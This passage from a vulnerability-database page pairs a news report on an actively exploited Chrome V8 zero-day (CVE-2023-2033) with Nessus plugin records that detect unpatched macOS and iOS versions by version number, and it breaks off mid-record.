DATABASE RESOURCES PRICING ABOUT US

{"id": "THN:CDFC216AC6B26D35C38BDB32822B4E96", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Google Releases Urgent Chrome Update to Fix Actively Exploited Zero-Day Vulnerability", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg1CUbcQScbnTemjH3z-9z7l3lye-ZJqruEuNRoONKxyXz0UkWl_skXsdzuxg5Cyw6VemvnadXx5JVa-UgtYCu3ALMbFcng4yzhHI3pVtvVU9eqkmGx2H7nPIMkGapwSvVPx5HY2ASP51LVelcKSJzC0nGN6Hzq-5upm_ZDqq02Ljx_s0wB8inyj242/s728-e365/google-chrome.png>)\n\nGoogle on Friday released out-of-band updates to resolve an actively exploited zero-day flaw in its Chrome web browser, making it the first such bug to be addressed since the start of the year.\n\nTracked as **CVE-2023-2033**, the high-severity vulnerability has been described as a [type confusion issue](<https://cwe.mitre.org/data/definitions/843.html>) in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on April 11, 2023.\n\n\"Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page,\" [according](<https://nvd.nist.gov/vuln/detail/CVE-2023-2033>) to the NIST's National Vulnerability Database (NVD).\n\nThe tech giant [acknowledged](<https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html>) that \"an exploit for CVE-2023-2033 exists in the wild,\" but stopped short of sharing additional technical specifics or indicators of compromise (IoCs) to prevent further exploitation by threat actors.\n\nCVE-2023-2033 also appears to share similarities with [CVE-2022-1096](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>), [CVE-2022-1364](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>), [CVE-2022-3723](<https://thehackernews.com/2022/10/google-issues-urgent-chrome-update-to.html>), and [CVE-2022-4262](<https://thehackernews.com/2022/12/google-rolls-out-new-chrome-browser.html>) \u2013 four other actively abused type confusion flaws in V8 that were remediated by Google in 2022.\n\nGoogle closed out a total of nine zero-days in Chrome last year. The development comes days after Citizen Lab and Microsoft [disclosed](<https://thehackernews.com/2023/04/israel-based-spyware-firm-quadream.html>) the exploitation of a now-patched flaw in Apple iOS by customers of a shadowy spyware vendor named QuaDream to target journalists, political opposition figures, and an NGO worker in 2021.\n\nIt also comes within a week of Apple releasing updates to patch two actively exploited zero-day vulnerabilities ([CVE-2023-28205 and CVE-2023-28206](<https://thehackernews.com/2023/04/apple-releases-updates-to-address-zero.html>)) in iOS, iPadOS, macOS, and Safari web browser that could lead to arbitrary code execution.\n\nUsers are recommended to upgrade to version 112.0.5615.121 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2023-04-15T03:58:00", "modified": "2023-04-17T06:21:11", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://thehackernews.com/2023/04/google-releases-urgent-chrome-update-to.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2022-1096", "CVE-2022-1364", "CVE-2022-3723", "CVE-2022-4262", "CVE-2023-2033", "CVE-2023-28205", "CVE-2023-28206"], "immutableFields": [], "lastseen": "2023-04-17T06:59:37", "viewCount": 92, "enchantments": {"dependencies": {"references": [{"type": "altlinux", "idList": ["AF33DF2FCB7CD238CA2AC81CF198F71E"]}, {"type": "apple", "idList": ["APPLE:17ECDD9D843E3FB37FB8F9A31FE36A99", "APPLE:4D00E7FBD6D305B98412E984CF5CBEB0", "APPLE:522AA8B4B44916121871E87266D0A714", "APPLE:99268A3B7560FFD18FBA01ACF4C3686D", "APPLE:C0D7C1E42F184FC31F8109C2C5484099", "APPLE:D5B90B4C3FFEF1EFC2D895F960EB301D"]}, {"type": "attackerkb", "idList": ["AKB:134D4E7D-267A-488A-A5A6-579DB92BB20D", "AKB:1F95080F-4C69-401E-9659-D6FBB9B68458", "AKB:64665D95-5095-4796-9404-96BAEED41106", "AKB:6D883363-6A9C-411A-8D48-5872842B65D3", "AKB:79231140-E51A-4D22-BCAC-EE105E3A962C", "AKB:FF8776A0-8F09-4620-A059-9AA63732C37D"]}, {"type": "avleonov", "idList": ["AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692", "AVLEONOV:8FE7F4C2B563A2A88EB2DA8822A13824", "AVLEONOV:B4AA36B0AF8AA2D059C914E5F2B15CC0", "AVLEONOV:E5467F48E50B8E100B59F5D3A20F8BC8", "AVLEONOV:FDBB133A2C9231CE02F5A15C4AC02F24"]}, {"type": "chrome", "idList": ["GCSA-272405271979539515", "GCSA-2955998722942640296", "GCSA-3812047510544759764", "GCSA-6591445864469691028", "GCSA-7014549802422661685", "GCSA-747586420530407117"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2022-1096", "CISA-KEV-CVE-2022-1364", "CISA-KEV-CVE-2022-3723", "CISA-KEV-CVE-2022-4262", "CISA-KEV-CVE-2023-28205", "CISA-KEV-CVE-2023-28206"]}, {"type": "cnvd", "idList": ["CNVD-2022-85092"]}, {"type": "cve", "idList": ["CVE-2022-1096", "CVE-2022-1364", "CVE-2022-3723", "CVE-2022-4262", "CVE-2023-2033", "CVE-2023-28205", "CVE-2023-28206"]}, {"type": "debian", "idList": ["DEBIAN:DSA-5110-1:CD232", "DEBIAN:DSA-5121-1:3B3A1", "DEBIAN:DSA-5263-1:A8269", "DEBIAN:DSA-5295-1:10985", "DEBIAN:DSA-5390-1:E9996"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2022-1096", "DEBIANCVE:CVE-2022-1364", "DEBIANCVE:CVE-2022-3723", "DEBIANCVE:CVE-2022-4262", "DEBIANCVE:CVE-2023-2033"]}, {"type": "fedora", "idList": ["FEDORA:0BF68306D452", "FEDORA:25D31307CC0A", "FEDORA:2A81C3067778", "FEDORA:7264F30C2A76", "FEDORA:B033C30C3DD2", "FEDORA:E6CD0309D335"]}, {"type": "freebsd", "idList": ["1225C888-56EA-11ED-B5C3-3065EC8FD3EC", "2899DA38-7300-11ED-92CE-3065EC8FD3EC", "323F900D-AC6D-11EC-A0B8-3065EC8FD3EC", "6F0327D4-9902-4042-9B68-6FC2266944BC", "A25EA27B-BCED-11EC-87B5-3065EC8FD3EC"]}, {"type": "gentoo", "idList": ["GLSA-202208-25"]}, {"type": "github", "idList": ["GITHUB:D9472F716C46C02F88677DBAD0EEA334"]}, {"type": "githubexploit", "idList": ["D424D6C6-13F7-5CAE-8771-9103296520B9"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA"]}, {"type": "hivepro", "idList": ["HIVEPRO:1803306DD93E61E87A6FDA05BE06FDF8", "HIVEPRO:573E7326CF205779BA6C4D3AB8DDB736", "HIVEPRO:8BBDC3730B0C7EEC6924023913800CB9", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:F95B9B5A24C6987E85478A62BD37DD7D"]}, {"type": "ics", "idList": ["ICSA-22-209-01"]}, {"type": "kaspersky", "idList": ["KLA12492", "KLA12513", "KLA12529", "KLA20035", "KLA20109", "KLA20196"]}, {"type": "krebs", "idList": ["KREBS:6AC9E60DC3816008721D063978E4A564"]}, {"type": "mageia", "idList": ["MGASA-2022-0118", "MGASA-2022-0146", "MGASA-2022-0419", "MGASA-2022-0451"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:08FDD3DEF41B63F1DEB23C21DCFDB12D", "MALWAREBYTES:3203C761121FB47FC676CC2505B4A9FD", "MALWAREBYTES:4FCBD5A9882474969BB67DE6ECA7A4C7", "MALWAREBYTES:B487BF5B3E6EA5BB5C7CABAF0083C8A5", "MALWAREBYTES:CBCD880E5209A5267DCBEB5FB041C435"]}, {"type": "mscve", "idList": ["MS:CVE-2022-1096", "MS:CVE-2022-1364", "MS:CVE-2022-3723", "MS:CVE-2022-4262", "MS:CVE-2023-2033"]}, {"type": "nessus", "idList": ["701396.PASL", "701400.PASL", "701429.PASL", "APPLE_IOS_1575_CHECK.NBIN", "APPLE_IOS_1641_CHECK.NBIN", "DEBIAN_DSA-5110.NASL", "DEBIAN_DSA-5121.NASL", "DEBIAN_DSA-5263.NASL", "DEBIAN_DSA-5295.NASL", "FREEBSD_PKG_1225C88856EA11EDB5C33065EC8FD3EC.NASL", "FREEBSD_PKG_2899DA38730011ED92CE3065EC8FD3EC.NASL", "FREEBSD_PKG_323F900DAC6D11ECA0B83065EC8FD3EC.NASL", "FREEBSD_PKG_6F0327D4990240429B686FC2266944BC.NASL", "FREEBSD_PKG_A25EA27BBCED11EC87B53065EC8FD3EC.NASL", "GENTOO_GLSA-202208-25.NASL", "GOOGLE_CHROME_100_0_4896_127.NASL", "GOOGLE_CHROME_107_0_5304_87.NASL", "GOOGLE_CHROME_108_0_5359_94.NASL", "GOOGLE_CHROME_112_0_5615_121.NASL", "GOOGLE_CHROME_99_0_4844_84.NASL", "MACOSX_GOOGLE_CHROME_100_0_4896_127.NASL", "MACOSX_GOOGLE_CHROME_107_0_5304_87.NASL", "MACOSX_GOOGLE_CHROME_108_0_5359_94.NASL", "MACOSX_GOOGLE_CHROME_112_0_5615_121.NASL", "MACOSX_GOOGLE_CHROME_99_0_4844_84.NASL", "MACOS_HT213721.NASL", "MACOS_HT213724.NASL", "MACOS_HT213725.NASL", "MICROSOFT_EDGE_CHROMIUM_100_0_1185_44.NASL", "MICROSOFT_EDGE_CHROMIUM_107_0_1418_26.NASL", "MICROSOFT_EDGE_CHROMIUM_108_0_1462_41.NASL", "MICROSOFT_EDGE_CHROMIUM_108_0_1462_42.NASL", "MICROSOFT_EDGE_CHROMIUM_99_0_1150_55.NASL", "OPENSUSE-2022-0114-1.NASL", "OPENSUSE-2022-10177-1.NASL", "OPENSUSE-2022-10180-1.NASL", "OPENSUSE-2022-10218-1.NASL", "OPENSUSE-2022-10219-1.NASL", "OPENSUSE-2022-10236-1.NASL", "OPENSUSE-2022-10254-1.NASL", "UBUNTU_USN-5350-1.NASL"]}, {"type": "osv", "idList": ["OSV:DSA-5110-1", "OSV:DSA-5121-1", "OSV:DSA-5263-1", "OSV:DSA-5295-1", "OSV:DSA-5390-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:167516"]}, {"type": "qt", "idList": ["QT:B64AD93E56170FC29816162A7B78DDBC"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:058E013CF475F33D6DEBB8955340D15B", "QUALYSBLOG:2FF98A895C020ED1CE5E7F898BD6BA9A", "QUALYSBLOG:5A5DF56C2B4E5DB4176574A83F54FECB", "QUALYSBLOG:61F9CF49EC3AE08D7038DF2EB7A34AC9", "QUALYSBLOG:E44F97839C7555E7A3CA4C08F8074CFD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2022-1364", "RH:CVE-2023-28205"]}, {"type": "securelist", "idList": ["SECURELIST:0ED76DA480D73D593C82769757DFD87A", "SECURELIST:11665FFD7075FB9D59316195101DE894"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2022:0091-1", "OPENSUSE-SU-2022:0103-1", "OPENSUSE-SU-2022:0110-1", "OPENSUSE-SU-2022:0114-1", "OPENSUSE-SU-2022:0123-1", "OPENSUSE-SU-2022:0156-1", "OPENSUSE-SU-2022:10177-1", "OPENSUSE-SU-2022:10180-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0590B57B0EE82F183D901AD4C42EB516"]}, {"type": "thn", "idList": ["THN:0ADE883013E260B4548F6E16D65487D3", "THN:222F7713CA968509F8C385BA29B0B6A5", "THN:2E90A09BA23747C57B4B5C9ED7D13ED9", "THN:2FB8A3C1E526D1FFA1477D35F0F70BF4", "THN:31DAA0B9538D69BB42EFB6567298FF49", "THN:C9CB70D59541495680ADDB984FFECDD0", "THN:CE48B3DDA855F117035F84E39BB0D811", "THN:E48AEFF468AB8445D91A32B6F5D7A770", "THN:EC6517AAC0BD5D8BBC4C4D32420CA903", "THN:ED17BB6E1286DD4E36EFE5877F25B545", "THN:EDC4E93542AFAF751E67BF527C826DA4", "THN:FFFF05ECDE44C9ED26B53D328B60689B"]}, {"type": "threatpost", "idList": ["THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:91A97EE2BD6933FEB9A07162BD4ED8B5", "THREATPOST:A8A7A761CD72E2732BD9E3C75C4A2ACC"]}, {"type": "trellix", "idList": ["TRELLIX:8CB786600FA7F187E3D16B1E340639C2", "TRELLIX:C3BC4A8730F3B1E4C9A82C07C31138D4"]}, {"type": "ubuntu", "idList": ["USN-5350-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2022-1096", "UB:CVE-2022-1364", "UB:CVE-2022-3723", "UB:CVE-2022-4262"]}, {"type": "veracode", "idList": ["VERACODE:34866", "VERACODE:35135", "VERACODE:38026", "VERACODE:38403"]}]}, "epss": [{"cve": "CVE-2022-1096", "epss": 0.00363, "percentile": 0.68092, "modified": "2023-04-16"}, {"cve": "CVE-2022-1364", "epss": 0.00604, "percentile": 0.75369, "modified": "2023-04-16"}, {"cve": "CVE-2022-3723", "epss": 0.00205, "percentile": 0.569, "modified": "2023-04-16"}, {"cve": "CVE-2022-4262", "epss": 0.00234, "percentile": 0.59958, "modified": "2023-04-16"}, {"cve": "CVE-2023-2033", "epss": 0.00047, "percentile": 0.14122, "modified": "2023-04-16"}, {"cve": "CVE-2023-28205", "epss": 0.01729, "percentile": 0.86015, "modified": "2023-04-16"}, {"cve": "CVE-2023-28206", "epss": 0.00664, "percentile": 0.76659, "modified": "2023-04-16"}], "score": {"value": 9.1, "vector": "NONE"}, "vulnersScore": 9.1}, "_state": {"dependencies": 1681715408, "score": 1698856110, "epss": 1681715872}, "_internal": {"score_hash": "362ea73be8a2da000fdad3c4500293c4"}}

{"nessus": [{"lastseen": "2023-10-22T17:40:02", "description": "The remote host is running a version of macOS / Mac OS X that is 13.x prior to 13.3.1. It is, therefore, affected by multiple vulnerabilities:\n\n - An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28206)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for these issues but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2023-04-07T00:00:00", "type": "nessus", "title": "macOS 13.x < 13.3.1 Multiple Vulnerabilities (HT213721)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-10-12T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT213721.NASL", "href": "https://www.tenable.com/plugins/nessus/174022", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174022);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/12\");\n\n script_cve_id(\"CVE-2023-28205\", \"CVE-2023-28206\");\n script_xref(name:\"APPLE-SA\", value:\"HT213721\");\n script_xref(name:\"IAVA\", value:\"2023-A-0177-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"macOS 13.x < 13.3.1 Multiple Vulnerabilities (HT213721)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 13.x prior to 13.3.1. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this\n issue may have been actively exploited. (CVE-2023-28206)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a\n report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for these issues but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT213721\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 13.3.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28205\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\n\nvar constraints = [\n { 'fixed_version' : '13.3.1', 'min_version' : '13.0', 'fixed_display' : 'macOS Ventura 13.3.1' }\n];\n\nvcf::apple::macos::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-22T17:40:02", "description": "The version of Apple iOS running on the mobile device is prior to 15.7.5. It is, therefore, affected by multiple vulnerabilities.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\n - An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Big Sur 11.7.6, macOS Ventura 13.3.1. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28206)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-13T00:00:00", "type": "nessus", "title": "Apple iOS < 15.7.5 Multiple Vulnerabilities (HT213723)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-10-12T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_1575_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/174215", "sourceData": "Binary data apple_ios_1575_check.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-22T17:39:18", "description": "The remote host is running a version of macOS / Mac OS X that is 12.x prior to 12.6.5. It is, therefore, affected by a vulnerability:\n\n - An out-of-bounds write issue was addressed with improved input validation. (CVE-2023-28206)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2023-04-10T00:00:00", "type": "nessus", "title": "macOS 12.x < 12.6.5 (HT213724)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28206"], "modified": "2023-10-12T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT213724.NASL", "href": "https://www.tenable.com/plugins/nessus/174036", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174036);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/12\");\n\n script_cve_id(\"CVE-2023-28206\");\n script_xref(name:\"APPLE-SA\", value:\"HT213724\");\n script_xref(name:\"IAVA\", value:\"2023-A-0177-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"macOS 12.x < 12.6.5 (HT213724)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 12.x prior to 12.6.5. It is, therefore, affected by a\nvulnerability:\n\n - An out-of-bounds write issue was addressed with improved input validation. (CVE-2023-28206)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT213724\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 12.6.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28206\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\n\nvar constraints = [\n { 'fixed_version' : '12.6.5', 'min_version' : '12.0', 'fixed_display' : 'macOS Monterey 12.6.5' }\n];\n\nvcf::apple::macos::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-22T13:17:45", "description": "The remote host is running a version of macOS / Mac OS X that is 11.x prior to 11.7.6. It is, therefore, affected by a vulnerability:\n\n - An out-of-bounds write issue was addressed with improved input validation. (CVE-2023-28206)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2023-04-10T00:00:00", "type": "nessus", "title": "macOS 11.x < 11.7.6 (HT213725)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28206"], "modified": "2023-10-12T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT213725.NASL", "href": "https://www.tenable.com/plugins/nessus/174037", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174037);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/12\");\n\n script_cve_id(\"CVE-2023-28206\");\n script_xref(name:\"APPLE-SA\", value:\"HT213725\");\n script_xref(name:\"IAVA\", value:\"2023-A-0177-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"macOS 11.x < 11.7.6 (HT213725)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 11.x prior to 11.7.6. It is, therefore, affected by a\nvulnerability:\n\n - An out-of-bounds write issue was addressed with improved input validation. (CVE-2023-28206)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT213725\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 11.7.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28206\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\n\nvar constraints = [\n { 'fixed_version' : '11.7.6', 'min_version' : '11.0', 'fixed_display' : 'macOS Big Sur 11.7.6' }\n];\n\nvcf::apple::macos::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-12T03:35:12", "description": "The remote Rocky Linux 9 host has packages installed that are affected by a vulnerability as referenced in the RLSA-2023:1918 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-26T00:00:00", "type": "nessus", "title": "Rocky Linux 9 : webkit2gtk3 (RLSA-2023:1918)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:rocky:linux:webkit2gtk3", "p-cpe:/a:rocky:linux:webkit2gtk3-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-debugsource", "p-cpe:/a:rocky:linux:webkit2gtk3-devel", "p-cpe:/a:rocky:linux:webkit2gtk3-devel-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-debuginfo", "p-cpe:/a:rocky:linux:webkit2gtk3-jsc-devel", 